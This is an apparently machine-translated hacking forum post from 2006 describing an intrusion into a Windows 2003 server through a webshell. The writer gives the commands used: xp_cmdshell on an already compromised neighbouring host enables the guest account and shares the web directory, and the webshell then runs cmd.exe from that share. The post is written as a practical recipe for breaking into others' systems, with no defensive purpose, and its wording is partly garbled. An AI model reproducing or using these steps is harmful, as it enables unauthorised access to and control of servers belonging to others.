In the WEBSHELL, the clever use of file sharing to perform system commands-bug warning-the black bar safety net

2006-01-19T00:00:00
ID MYHACK58:6220066492
Type myhack58
Reporter 佚名
Modified 2006-01-19T00:00:00

Description

Recently in the invasion of Win2003 when found default case not use the system comes with the cmd. exe files to execute system commands, upload the cmd. exe file because the file is too big to fail, then I pass a station adjacent to the machine's file share successfully upload the cmd. exe file, the specific process is as follows: We have acquired the adjacent machine 192.168.1.1-administrator privileges, use SQL's xp_cmdshell command executes the following operations:  net user guest /active:yes open the guest user to allow file sharing anonymous access  net share the web=d:\the web the WEB directory sharing

Then in the target machine on the WEBSHELL on the following input: \\192.168.1.1\web\cmd.exe

Finally, on the figure of the SHELL path to c:\in cmd. exe to the normal operating system commands.

Since cmd. exe by Pack uploaded toservice, I suggest which experts to write an ASP-based RAR decompression software to easy 2 0 0 3Serviceunder the upload cmd. exe program